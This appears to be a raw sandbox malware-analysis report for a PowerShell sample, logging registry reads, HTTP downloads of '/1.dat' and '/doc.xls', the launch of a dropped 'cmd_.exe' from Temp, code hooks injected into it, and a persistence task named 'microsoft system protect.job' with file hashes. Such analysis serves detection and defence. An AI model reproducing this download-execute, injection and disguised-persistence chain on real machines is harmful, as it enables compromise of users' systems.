Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe show_window = SW_SHOWNORMAL True 1
Module (4)
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
User (1)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (7)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = EXB9WSP True 1
Get Info type = Operating System True 5
Mutex (22)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Release mutex_name = Global\.net clr networking True 1
Release mutex_name = Global\.net clr networking True 10
Environment (144)
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 132
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Get Environment String name = HOMEPATH, result_out = \Users\qj4SUKboE True 1
Get Environment String name = HomeDrive, result_out = C: True 1
Get Environment String name = HomePath, result_out = \Users\qj4SUKboE True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = temp, result_out = C:\Users\QJ4SUK~1\AppData\Local\Temp True 2
Set Environment String name = PSMODULEPATH, value = C:\Users\qj4SUKboE\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Network Behavior
DNS (1)
Operation Additional Information Success Count Logfile
Resolve Name host =, address_out = True 1
HTTP Sessions (2)
Information Value
Total Data Sent 118 bytes
Total Data Received 174.80 KB
Contacted Host Count 1
Contacted Hosts
HTTP Session #1
Information Value
Server Name
Server Port 80
Data Sent 70
Data Received 561
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Open Connection protocol = http, server_name =, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /1.dat True 1
Send HTTP Request headers = host:, connection: Keep-Alive, url = True 1
Read Response size = 4096, size_out = 561 True 1
HTTP Session #2
Information Value
Server Name
Server Port 80
Data Sent 48
Data Received 178435
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Open Connection protocol = http, server_name =, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /doc.xls True 1
Send HTTP Request headers = host:, url = True 1
Read Response size = 4096, size_out = 1448 True 1
Read Response size = 65536, size_out = 11584 True 1
Read Response size = 65536, size_out = 65536 True 1
Read Response size = 65536, size_out = 21584 True 1
Read Response size = 65536, size_out = 63888 True 1
Read Response size = 14395, size_out = 5808 True 1
Read Response size = 8587, size_out = 1452 True 1
Read Response size = 7135, size_out = 1452 True 1
Read Response size = 5683, size_out = 5683 True 1
Process #6: cmd_.exe
995 254
Information Value
ID #6
File Name c:\users\qj4suk~1\appdata\local\temp\cmd_.exe
Command Line "C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe"
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:06, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:32
OS Process Information
Information Value
PID 0x814
Parent PID 0x9e4 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 808
0x BF4
0x BE0
0x 538
0x 810
0x B80
0x B6C
0x 940
0x 8EC
0x 8F4
0x A18
0x A30
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable True False False -
private_0x0000000000220000 0x00220000 0x00270fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000220000 0x00220000 0x00220fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0024efff Private Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00268fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00269fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00261fff Pagefile Backed Memory Readable True False False -
private_0x0000000000270000 0x00270000 0x00270fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002d0000 0x002d0000 0x0034ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x002e0000 0x002e0fff Memory Mapped File Readable False False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable, Writable True False False -
oleaccrc.dll 0x00300000 0x00300fff Memory Mapped File Readable False False False -
pagefile_0x0000000000300000 0x00300000 0x00308fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x00309fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00300000 0x0030ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000350000 0x00350000 0x00351fff Pagefile Backed Memory Readable True False False -
index.dat 0x00350000 0x00357fff Memory Mapped File Readable, Writable True False False -
cversions.2.db 0x00360000 0x00363fff Memory Mapped File Readable True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory Readable, Writable True False False -
private_0x0000000000380000 0x00380000 0x003bffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00390000 0x003a3fff Memory Mapped File Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003b0fff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003fffff Private Memory Readable, Writable True False False -
cmd_.exe 0x00400000 0x0042cfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000430000 0x00430000 0x005b7fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x005c0000 0x005dffff Memory Mapped File Readable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x005e0fff Pagefile Backed Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db 0x005f0000 0x0061ffff Memory Mapped File Readable True False False -
private_0x0000000000620000 0x00620000 0x0069ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006a0000 0x006a0000 0x00820fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x00830000 0x00833fff Memory Mapped File Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x00846fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000850000 0x00850000 0x00851fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000860000 0x00860000 0x00860fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000890000 0x00890000 0x0098ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000990000 0x00990000 0x01d8ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d90000 0x0205efff Memory Mapped File Readable False False False -
private_0x0000000002060000 0x02060000 0x0215ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002160000 0x02160000 0x0223efff Pagefile Backed Memory Readable True False False -
private_0x0000000002240000 0x02240000 0x0233ffff Private Memory Readable, Writable True False False -
private_0x0000000002240000 0x02240000 0x0227ffff Private Memory Readable, Writable True False False -
private_0x0000000002340000 0x02340000 0x0243ffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x02440000 0x024a5fff Memory Mapped File Readable True False False -
private_0x00000000024b0000 0x024b0000 0x025affff Private Memory Readable, Writable True False False -
pagefile_0x00000000025b0000 0x025b0000 0x029a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x02aeffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02beffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02d1ffff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02c2ffff Private Memory Readable, Writable True False False -
private_0x0000000002ce0000 0x02ce0000 0x02d1ffff Private Memory Readable, Writable True False False -
private_0x0000000002d20000 0x02d20000 0x02f3ffff Private Memory Readable, Writable True False False -
ieframe.dll 0x72550000 0x72fcffff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x72fd0000 0x73a4ffff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x73a50000 0x73b44fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x73d90000 0x73d9cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x73db0000 0x73dc4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x73dd0000 0x73e21fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73e10000 0x73e4bfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73e30000 0x73e36fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73e40000 0x73e83fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73e50000 0x73e8bfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73e90000 0x7402dfff Memory Mapped File Readable, Writable, Executable False False False -
xmllite.dll 0x74030000 0x7405efff Memory Mapped File Readable, Writable, Executable False False False -
taskschd.dll 0x74060000 0x740dcfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74060000 0x74080fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74090000 0x740dbfff Memory Mapped File Readable, Writable, Executable False False False -
mstask.dll 0x740a0000 0x740d4fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x74bb0000 0x74bc1fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74bb0000 0x74bcbfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74bd0000 0x74bdafff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74d10000 0x74d8ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
odbcconf.dll 0x74e60000 0x74e69fff Memory Mapped File Readable, Writable, Executable False False False -
cryptdll.dll 0x74e70000 0x74e80fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x75060000 0x75073fff Memory Mapped File Readable, Writable, Executable False False False -
certcli.dll 0x75080000 0x750d5fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75190000 0x75284fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x752e0000 0x752f1fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x753d0000 0x753d4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x753e0000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75550000 0x7566cfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75680000 0x7581cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75820000 0x758a2fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x758b0000 0x758f4fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75a30000 0x75c2afff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75c30000 0x75cbefff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75cc0000 0x75cf4fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75f40000 0x7609bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76140000 0x76d89fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e70000 0x76e96fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76ff0000 0x77125fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x775a0000 0x775abfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
Code private_0x0000000000220000:+0x113 cmd_.exe:+0x2000 24.00 KB -
Code private_0x0000000000220000:+0x120 cmd_.exe:+0x2000 24.00 KB -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\windows\tasks\microsoft system protect.job 0.27 KB MD5: 3a50aa02030ff89e645423598c8e06fa
SHA1: 0b131b052a57672aab55874a1106703cfcd6163a
SHA256: 83a96ed03808a9b12426d9d770f2a4b37d100f66cd271be8ea9c5b814be878e7
c:\windows\tasks\microsoft system protect.job 0.27 KB MD5: 5803c2d1a7f6a381cbf58b3ce1429dae
SHA1: c038ab19f0df090fb7778042be6c17ddfd585c16
